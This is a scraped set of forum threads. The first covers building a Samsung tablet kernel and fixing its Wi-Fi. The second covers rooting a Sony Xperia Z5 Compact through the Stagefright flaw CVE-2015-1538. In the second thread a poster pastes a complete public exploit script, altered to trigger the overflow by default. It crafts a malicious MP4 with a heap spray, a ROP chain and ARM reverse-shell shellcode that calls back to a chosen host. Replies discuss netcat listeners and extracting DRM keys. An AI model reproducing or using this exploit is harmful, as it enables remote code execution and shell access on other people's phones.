Instruction to build a kernel from Samsung Sources:
1. Download and unpack source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525
2. Download and upack android ndk from https://developer.android.com/tools/sdk/ndk/index.html
3. Set enviroment varibles (use gcc 4.6, not 4.8):
export CROSS_COMPILE="~/android/android-ndk-r9d/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"
export ARCH="arm"
Click to expand...
Click to collapse
4. If you want to add loadable modules support, apply patch modules_support.patch from attach
patch -p1 < modules_support.patch
Click to expand...
Click to collapse
5. Create kernel config
make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig
Click to expand...
Click to collapse
6. Buld kernel
make -j3
Click to expand...
Click to collapse
7. Buld device tree image
./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/
Click to expand...
Click to collapse
8. Buld boot.img (default ramdisk image in attach)
./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img
Click to expand...
Click to collapse
9. Create .tar.md5 to flash with Odin
tar -H ustar -c boot.img > boot.tar
md5sum -t boot.tar >> boot.tar
mv boot.tar boot.tar.md5
Click to expand...
Click to collapse
10. To fix Wi-Fi edit build.prop on your device, change ro.securestorage.support fron true to false
ro.securestorage.support=false
Click to expand...
Click to collapse
GitHub: https://github.com/vanyasvl/android_kernel_samsung_picassoeur
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
Hello. I'm trying to build stock Samsung kernel for Tab Pro 10.1 Sm-T525 and I have a problem:<br />
Wi-fi isn't working on builded kernel. All kernel configs are default from Samsung, bluetooth and Lte works ok.<br />
<br />
I need help with debug wifi problem.<br />
"ip a" command shows wlan0 network device, but wifi can't be enabled from configuration<br />
<br />
My steps to build kernel:<br />
Download source from http://opensource.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=sm-t525<br />
unpack it to ~/android/kernel<br />
<br />
cd ~/android/kernel<br />
export CROSS_COMPILE="/home/vanyas/android/android-ndk-r9d_x64/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin/arm-linux-androideabi-"<br />
export ARCH="arm"<br />
<br />
make VARIANT_DEFCONFIG=msm8974_sec_picassoeur_defconfig msm8974_sec_defconfig SELINUX_DEFCONFIG=selinux_defconfig<br />
make -j3<br />
<br />
./tools/dtbTool -o dt.img -s 2048 -p ./scripts/dtc/ ./arch/arm/boot/<br />
<br />
unpack original boot.img with split_boot to boot folder<br />
<br />
./tools/mkbootimg --kernel ./arch/arm/boot/zImage --ramdisk boot/boot.img-ramdisk.cpio.gz --cmdline 'console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x37 ehci-hcd.park=3' --base 0x00000000 --pagesize 2048 --ramdisk_offset 0x02000000 --tags_offset 0x01E00000 --dt dt.img -o boot.img<br />
<br />
tar -H ustar -c boot.img > boot.tar<br />
md5sum -t boot.tar >> boot.tar<br />
mv boot.tar boot.tar.md5
Click to expand...
Click to collapse
Click to expand...
Click to collapse
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
crpalmer said:
For the sm-t320, the kernel is built with version checks on the modules. This is what I did to allow the wlan module to load:
https://github.com/crpalmer/android...mmit/76275b29746dfeab37efeab6c2787af9acd3394c
You'd obviously need to specify the right version string (it should be in the output of dmesg if this is why your wlan isn't working).
Also, if you plan on sharing the kernel, you should zip the .tar.md5 file as I had problems with it failing to flash after downloading when I released just a .tar.md5.
Click to expand...
Click to collapse
Thanks, but it is not a module load problem. SM-T525 kernel builds without modules support and wifi driver (bcm4339) compilled into the kernel.
vanyas said:
Thanks, but it is not a module load problem. SM-T525 kernel builds without modules support and wifi driver (bcm4339) compilled into the kernel.
Click to expand...
Click to collapse
That's interesting. The sm-t320 is a prima chipset which is built as a module.
Do you see anything in the logcat or the dmesg related to the wlan, bcm4339, wifi, etc?
There are patches for SM-T525 kernel source that resolve problem with "modules support" compilation
--- kernel_orig/arch/arm/mm/proc-syms.c 2014-04-09 12:10:04.846114000 +1100
+++ kernel/arch/arm/mm/proc-syms.c 2014-04-09 11:54:33.894114000 +1100
@@ -18,7 +18,6 @@
#ifndef MULTI_CPU
EXPORT_SYMBOL(cpu_dcache_clean_area);
EXPORT_SYMBOL(cpu_set_pte_ext);
-EXPORT_SYMBOL(cpu_tima_set_pte_ext);
#else
EXPORT_SYMBOL(processor);
#endif
--- kernel_orig/arch/arm/mach-msm/sec-switch.c 2014-01-23 15:34:20.000000000 +1100
+++ kernel/arch/arm/mach-msm/sec-switch.c 2014-04-09 11:29:26.322114000 +1100
@@ -2565,7 +2565,7 @@
pr_info("%s: Ignore Cable setting, Not LPM mode\n", __func__);
}
}
-EXPORT_SYMBOL(fsa9485_set_mhl_cable)
+EXPORT_SYMBOL(fsa9485_set_mhl_cable);
boon fsa9485_muic_is_mhl_attached(void)
{
--- kernel_orig/Makefile 2014-01-23 15:34:19.000000000 +1100
+++ kernel/Makefile 2014-04-09 20:55:48.278114000 +1100
@@ -351,7 +351,7 @@
CHECKFLAGS := -D__linux__ -Dlinux -D__STDC__ -Dunix -D__unix__ \
-Wbitwise -Wno-return-void $(CF)
-CFLAGS_MODULE =
+CFLAGS_MODULE = -fno-pic
AFLAGS_MODULE =
LDFLAGS_MODULE =
CFLAGS_KERNEL =
Click to expand...
Click to collapse
Yes! I did it!
To fix wifi: ro.securestorage.support=false in build.prop
thornev said:
I'm not a builder, but when wifi doesn't work that usually means a mismatch between kernel and rom.
Sent from my SM-T320 using Tapatalk
Click to expand...
Click to collapse
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
scrosler said:
I am a builder and what he said is correct.
Samsung did some crazy stuff with Knox.
Click to expand...
Click to collapse
can you make a thread showing us some the difficulties you encountered working around Knox?
Silkmeister
@Silkmeister1, @Scott, @vanyas, @crpalmer:
I do have a WiFi/BT issue with my (second hand) device. Wifi/BT is not to be enabled in Android. My first suspect was a broken connection, but couldn't found something obvious.
I tried to update Stock Rom and found and issue with ODIN. Stock Rom was not installable, returns with size error in hidden image. (??? what is in there ???). Installed latest LOS and checked the boot messages.
Do you think this can be a software issue? Is there anything missing (stuff in hidden partition) ?
Code:
failed to power up wifi chip, retry again (4 left) **
[ 4.035535] ## wifi_remove
[ 4.035538] wifi_set_power = 0
[ 4.035541] ------------------------------------------------
[ 4.035542] ------------------------------------------------
[ 4.035544] brcm_wlan_power Enter: power off
[ 4.035548] WL_REG_ON off-step : [1]
[ 4.035554] WL_REG_ON off-step-2 : [0]
[ 4.139482] wifi_set_carddetect = 0
[ 4.139485] brcm_wifi_status:359 status 0
[ 4.139487] mmc0: Slot status change detected (1 -> 0)
[ 4.139870] wifi_set_power = 1
[ 4.139873] ------------------------------------------------
[ 4.139874] ------------------------------------------------
[ 4.139876] brcm_wlan_power Enter: power on
[ 4.139880] WL_REG_ON on-step : [0]
[ 4.139887] WL_REG_ON on-step-2 : [1]
[ 4.349477] wifi_set_carddetect = 1
[ 4.349480] brcm_wifi_status:359 status 1
…
Complete bootlog can be seen here in the attachment:
https://forum.xda-developers.com/showpost.php?p=72624259&postcount=213
Any help is welcome!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello to the community!
I've seen a video on the Zimperium Stagefright Detector App page in the Google Play Store showing how you can get root access to an Android System. And that seems to be quiet easy - just executing a python script.
So my questions are:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven#t tested yet on my Sony Xperia Z5 compact device)
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the neccessary files in the System, maybe manually via telnet?
- Can this be done without unlocking the bootloader?
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Regards from Dresden
"Klaus"
klausstoertebeker said:
- Is the Sony Xperia Z5 compact vulnerable using the CVE-2015-1538 exploit? (haven#t tested yet on my Sony Xperia Z5 compact device)
Click to expand...
Click to collapse
Yes, according to Stagefright Detector. I could not get Stagefright to work on my Z5C, but that is probably due to my shortcomings.
klausstoertebeker said:
- Is it then possible to root the Sony Xperia Z5 compact permanently by changing the neccessary files in the System, maybe manually via telnet?
Click to expand...
Click to collapse
Probably not. Stagefright will give you "media" or "system" privileges. These users can't remount the system partition to make it writable. Also, Sony have strengthen the security using a kernel module (Sony RIC) that disallows any user (even root) to remount system partition.
However, you could maybe (very unlikely) find a system writable executable file in ramdisk and hope for root to execute your modified file.
klausstoertebeker said:
- Can this be done without unlocking the bootloader?
Click to expand...
Click to collapse
Afaik, no one have succeeded yet.
klausstoertebeker said:
- Which files have to be changed and what are the changes to get permanent root Access?
Maybe this is a way to backup the TA partition to preserve DRM keys if rooting is not possible with this method. And after backing up rooting could be done by unlocking the bootloader and then applying the root methods described in other threads.
Click to expand...
Click to collapse
Permanent root on this device is rather tough to achieve. You can't modify system partition due to dm-verity (verified boot), and you can most likely not modify boot partition without unlocking the bootloader.
As you say, your best shot is to achieve temporary root by exploiting some kernel module/driver and then dump TA. This is of course not trivial.
There is maybe another way to get both root and DRM features. As system user (achieved using Stagefright), you can query the "tad" socket to retrieve the DRM keys. This is how Sony is reading the DRM keys when verifying things. When you have the DRM keys you can unlock BL, root, and then modify your ROM to spoof "tad" socket responses with your previously extracted keys. Unlikely, but possibly, you could even write the keys back to the TA partition.
This method requires system privileges. If some clever one helps me getting Stagefright working, I could probably extract the DRM keys.
Maybe the CVE-2015-3636 is easier to use?
Hi nilezon!
Due to the fact I'm on vacation I can't try to get the CVE-2015-1538 exploit working - my SONY Xperia Z5 compact is at home
But I surfed the Internet and found another exploit that's maybe easier to be used to get root privileges: CVE-2015-3636
And if I get the document right, a non-privileged app could be used to get root privileges using a pointer use-after-free bug in the kernel. I'm not an app programmer (I just programmed aviation software parts for jet propulsed military planes ), but it seems to me that the way described in the linked document is easier to go than the way to use the CVE-2015-1538 - I read in the internet that Sony currently is delivering a patch closing the stagefright exploit.
To find out if my phone (SONY Xperia Z1 compact) and tablet are vulnerable to the CVE-2015-3636, I used the app VTS for Android.
If this is a walkable way and you could write an app, maybe the code for backing up the DRM keys or the whole TA Partition could be included into that app using the CVE-2015-3636 exploit to get even temporary root privileges...
What do you think?
Regards
"Klaus"
klausstoertebeker said:
...
Click to expand...
Click to collapse
AFAIK, the Z5 family is not vulnerable to the CVE-2015-3636 exploit.
Generating the CVE-1538-2015 mp4-file
Hi nilezon,
I was able to generate the CVE-1538-2015 file doing three modifications to the python code published by Joshua J. Drake:
Code:
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
# MMS is the most dangerous attack vector, but not the only one...
#
# DISCLAIMER: This exploit is for testing and educational purposes only. Any
# other usage for this code is not allowed. Use at your own risk.
#
# "With great power comes great responsibility." - Uncle Ben
#
import struct
import socket
#
# Creates a single MP4 atom - LEN, TAG, DATA
#
def make_chunk(tag, data):
if len(tag) != 4:
raise 'Yo! They call it "FourCC" for a reason.'
ret = struct.pack('>L', len(data) + 8)
ret += tag
ret += data
return ret
#
# Make an 'stco' atom - Sample Table Chunk Offets
#
def make_stco(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mNumChunkOffsets
return make_chunk('stco', ret+extra)
#
# Make an 'stsz' atom - Sample Table Size
#
def make_stsz(extra=''):
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mDefaultSampleSize
ret += struct.pack('>L', 0) # mNumSampleSizes
return make_chunk('stsz', ret+extra)
#
# Make an 'stts' atom - Sample Table Time-to-Sample
#
def make_stts():
ret = struct.pack('>L', 0) # version
ret += struct.pack('>L', 0) # mTimeToSampleCount
return make_chunk('stts', ret)
#
# This creates a single Sample Table Sample-to-Chunk entry
#
def make_stsc_entry(start, per, desc):
ret = ''
ret += struct.pack('>L', start + 1)
ret += struct.pack('>L', per)
ret += struct.pack('>L', desc)
return ret
#
# Make an 'stsc' chunk - Sample Table Sample-to-Chunk
#
# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
# cause a heap overflow.
#
# def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True):
ret = struct.pack('>L', 0) # version/flags
# this is the clean version...
if not do_overflow:
ret += struct.pack('>L', num_alloc) # mNumSampleToChunkOffsets
ret += 'Z' * (12 * num_alloc)
return make_chunk('stsc', ret)
# now the explicit version. (trigger the bug)
ret += struct.pack('>L', 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
# fill in the entries that will overflow the buffer
for x in range(0, num_write):
ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
ret = make_chunk('stsc', ret)
# patch the data_size
ret = struct.pack('>L', 8 + 8 + (num_alloc * 12)) + ret[4:]
return ret
#
# Build the ROP chain
#
# ROP pivot by Georg Wicherski! Thanks!
#
"""
(gdb) x/10i __dl_restore_core_regs
0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
"""
"""
b0001144 <__dl_mprotect>:
b0001144: e92d0090 push {r4, r7}
b0001148: e3a0707d mov r7, #125 ; 0x7d
b000114c: ef000000 svc 0x00000000
b0001150: e8bd0090 pop {r4, r7}
b0001154: e1b00000 movs r0, r0
b0001158: 512fff1e bxpl lr
b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
"""
def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
rop = ''
rop += struct.pack('<L', sp_addr + off + 0x10) # new sp
rop += struct.pack('<L', 0xb0002a98) # new lr - pop {pc}
rop += struct.pack('<L', 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
rop += struct.pack('<L', sp_addr & 0xfffff000) # new r0 - base address (page aligned)
rop += struct.pack('<L', 0x1000) # new r1 - length
rop += struct.pack('<L', 7) # new r2 - protection
rop += struct.pack('<L', 0xd000d003) # new r3 - scratch
rop += struct.pack('<L', 0xd000d004) # new r4 - scratch
rop += struct.pack('<L', 0xb0001144) # new pc - _dl_mprotect
native_start = sp_addr + 0x80
rop += struct.pack('<L', native_start) # address of native payload
#rop += struct.pack('<L', 0xfeedfed5) # top of stack...
# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
buf = ''
# fork
buf += '\x02\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# continue if not parent...
buf += '\x00\x00\x50\xe3'
buf += '\x02\x00\x00\x0a'
# exit parent
buf += '\x00\x00\xa0\xe3'
buf += '\x01\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# setsid in child
buf += '\x42\x70\xa0\xe3'
buf += '\x00\x00\x00\xef'
# socket/connect/dup2/dup2/dup2
buf += '\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c'
buf += '\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60'
buf += '\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0'
buf += '\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1'
buf += '\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06'
buf += '\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00'
buf += '\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0'
buf += '\xe3\x00\x00\x00\xef'
# execve(shell, argv, env)
buf += '\x30\x00\x8f\xe2\x04\x40\x24\xe0'
buf += '\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d'
buf += '\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00'
buf += '\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00'
buf += '\xef\x02\x00'
# Add the connect back host/port
buf += struct.pack('!H', cb_port)
cb_host = socket.inet_aton(cb_host)
buf += struct.pack('=4s', cb_host)
# shell -
buf += '/system/bin/sh\x00\x00'
# argv -
buf += 'sh\x00\x00'
# env -
buf += 'PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00'
# Add some identifiable stuff, just in case something goes awry...
rop_start_off = 0x34
x = rop_start_off + len(rop)
while len(rop) < 0x80 - rop_start_off:
rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
# import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
# data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)
(Modifications are: changing line 77 from "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False)" to "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True)" to achive using the exploit, commenting out "import mp4" in line 353 to avoid compiler errors and changing line 390 from "data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to "data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to avoid compiler errors.
To run the code I used the "Wing IDE" in combination with "Python 2.7.3". I used the -c <reconnect-IP-address> and -p <reconnect-port> arguments.
But I can't get reconnected from my Sony Xperia Z5 compact because I don't know how to backlisten to the phone and switch to a shell. Maybe the computer in the Zimperium video shows a Linux machine and I'm just running a Windows 7 machine.
But maybe it helps you on the way to save the DRM keys.
(By the way: In the video the "id" command after the first changing directory shows "uid=0(root)" and "gid=0(root)" which means to me that the user has root privileges. Or I'm wrong?)
"Klaus"
But the z3+ old firmware is vulnerable. Maybe You can use a z3+ system folder on z5! They are quite same!
Sent from my E6533 using XDA Free mobile app
Good job on modifying the script. I could run it on my linux box without any modifications and it produced an MP4. I then moved it over to my Z5C and launched it. After that I tried a reverse shell (netcat -l -p <port>) but got nothing. Then I went out on the interwebs to investigate and here are a couple of pointers.
1. The code is written to exploit the hangouts app specifically. So running the mp4 with any other player isn't going to work.
2. The code is written to take default values if -s and -r are not given to the scripts as arguments. The default values are said to only work on the Nexus device that it was written for.
3. The video you saw was edited to make it look really simple, or another script was run that they didn't show us.
More information can be found in the comments around here:
http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
Happy exploiting, Merry Christmas.
~Aeny
Hey @klausstoertebeker I have an un rooted stock Sony Z5 Compact that can be used for exploit testing. Wanted to offer it for this purpose before rooting it. If having someone volunteer their "un rooted, bootloader never unlocked-phone" as a test device is helpful then let me know.
Otherwise Im going to root my new phone soon.
Keep up the good work!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello Joeisgood99!
Thanks for your offer, but I'm not a programmer who takes part in rooting the Z5 compact actively 'cause I'm not experienced with Android programming at all. But I tried to give a thought how a root to this excellent mobile phone could be achieved.
For me using this exploit has become obselete 'cause I accidently did a System update where all the stagefright exploits are closed...
Regards
"Klaus"
You can downgrade your phone using the flashtools to a previous Android version. Dont give up!!!!
Sent from my E6533 using XDA Free mobile app
Maybe downgrade,...
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll loose your DRM-keys.
And the intention to most "rooting" forums is to find a way rooting the mobile phone without unlocking the bootloader to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROM's.
You don't need to unlock bootloader to flash an official firmware.
klausstoertebeker said:
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll loose your DRM-keys.
And the intention to most "rooting" forums is to find a way rooting the mobile phone without unlocking the bootloader to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROM's.
Click to expand...
Click to collapse
You can flash FTFs without any need of unlocking a Bootloader. And while you're at it: use 32.0.A.4.11 Literally everything exept CVE-2015-3876 is vunerable. I just bought a Z5, and looking forward to put some effort into messing with Stagefright rooting
I'm having a Z5 E6653 BTW
Sorry,...
... Myself5!
You're right saying that TFT's can be flashed without unlocking the bootloader. But nevertheless I won't downgrade again in the moment.
The reason for me to root my Z5 compact is that I'd like to install Xposed in combination with XPrivacy for security reasons. I want to controll the access of app to my personal data (contacts, calendar, location, etc). But now I found two apps which fulfil my security needs without root privileges:
MoboClean which is relased as working app
SRT AppGuard which is in beta stadium
I prefer the second solution, but in the moment it is still under development. I used it with KitKat and JellyBean and it was really good. And until it will be released as "productive" app I'll use MoboClean.
And the second reason for rooting my Z5 compact was that I want to deinstall those Google apps (and other pre-installed bloatware) which collect my data and "phone home" without my notice. And this can be done without rooting now on the Z5 compact via "Preferences -> Apps", selecting "Deactivate" in the appropriate app tab.
There is a number of stage fright vulnerabilitys in some of the stock firmware releases downloadable on Xperifirm. I have made screen shots and posted onbthis thread.
http://forum.xda-developers.com/showpost.php?p=64618471&postcount=93
pardon me,but i was just thinking..
https://www.nccgroup.trust/globalas...pers/2016/01/libstagefright-exploit-notespdf/
Here there are some steps/tips on how to deal with SELinux policy in order to use stagefright exploits successfully. Expert-oriented information
@zxz0O0 sorry to disturb you, don't know if you already know those things but i thought it's worth a check